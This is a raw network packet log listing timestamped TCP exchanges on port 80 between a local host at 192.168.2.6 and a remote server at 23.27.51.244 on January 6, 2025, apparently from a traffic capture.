Jan 6, 2025 06:03:59.177304983 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177314997 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177325010 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177331924 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177335978 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177356958 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177366972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177376986 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177387953 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177386999 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177398920 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177408934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177409887 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177419901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177431107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177433968 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177452087 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177470922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177587032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177714109 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177731991 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177742004 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177752972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177762985 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177763939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177772999 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177779913 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177783966 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177793980 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177799940 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177803993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177814960 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177818060 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177825928 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177833080 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177836895 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177848101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177858114 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177881002 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178164005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178174973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178184986 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178195000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178205013 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178208113 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178215027 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178225994 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178232908 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178246021 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178306103 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178316116 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178337097 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178350925 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178478003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178488970 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178498983 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178512096 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178519964 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178522110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178539038 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178539991 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178550005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178555012 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178560972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178571939 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178579092 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178581953 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178596020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178601980 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178606033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178616047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178617954 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178627014 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178639889 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178663015 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.178986073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.178997993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179008007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179018021 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179024935 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179028988 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179049969 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179073095 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179239988 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179250002 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179260015 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179270983 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179280043 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179281950 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179291010 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179301023 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179301977 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179310083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179318905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179327965 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179335117 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179339886 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179358959 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179380894 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179531097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179539919 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179549932 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179559946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179569006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179579973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179589987 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179600954 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179609060 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179615974 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179615974 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179617882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179627895 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179670095 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179670095 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179670095 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179815054 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179857016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179867029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179877043 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179886103 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179896116 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179903984 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179907084 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179913044 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179917097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179927111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179929972 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179938078 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179944992 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179948092 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179958105 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179966927 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.179968119 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179977894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179991007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.179994106 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.180000067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.180007935 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.180025101 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.266784906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266809940 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266819954 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266829014 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266839027 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266848087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266864061 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266875029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266932011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266942978 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.266999960 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267009020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267018080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267029047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267041922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267090082 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267119884 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267131090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267163992 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267199993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267210007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267220974 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267231941 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267239094 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267244101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267255068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267257929 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267278910 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267302990 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267335892 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267373085 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267445087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267456055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267467022 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267477036 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267477989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267489910 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267492056 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267499924 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267507076 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267510891 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267530918 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267544031 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267827034 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267837048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267848015 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267855883 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267865896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267877102 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267879963 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267885923 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267895937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267898083 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267906904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267918110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267926931 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267925978 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267940044 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267944098 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.267962933 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.267986059 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268049955 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268088102 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268153906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268165112 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268174887 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268184900 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268188000 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268196106 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268212080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268213987 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268223047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268225908 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268233061 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268239021 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268244028 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268253088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268264055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268265963 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268274069 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268285036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268292904 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268307924 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268331051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268603086 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268618107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268634081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268644094 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268646955 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268655062 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268663883 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268676996 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268691063 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268882036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268892050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268902063 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268910885 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268914938 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268922091 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268930912 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268934011 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268942118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268953085 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268956900 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268963099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268973112 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268975973 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.268984079 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268992901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.268997908 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269004107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269015074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269027948 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269038916 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269062996 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269365072 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269376040 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269386053 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269397020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269402981 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269407034 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269417048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269429922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269448042 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269654036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269664049 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269675016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269682884 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269690037 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269692898 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269702911 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269705057 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269711971 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269722939 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269731045 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269738913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269748926 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269751072 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269759893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269767046 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269769907 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269779921 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269788027 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269789934 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269799948 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269812107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269814014 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269819975 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.269828081 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.269849062 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270014048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270064116 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270157099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270168066 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270178080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270188093 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270191908 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270199060 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270209074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270209074 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270217896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270229101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270236015 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270245075 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270248890 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270256042 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270271063 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270272970 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270282984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270292044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270292997 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270303011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270312071 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270313978 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270322084 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270330906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270340919 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270344019 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270350933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270356894 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270360947 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270371914 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270380974 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270382881 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270390987 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.270412922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.270423889 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357469082 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357486010 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357505083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357516050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357532978 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357538939 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.357543945 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357553959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357564926 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357574940 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357585907 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357594967 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357606888 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.357624054 CET	49709	80	192.168.2.6	23.27.51.244
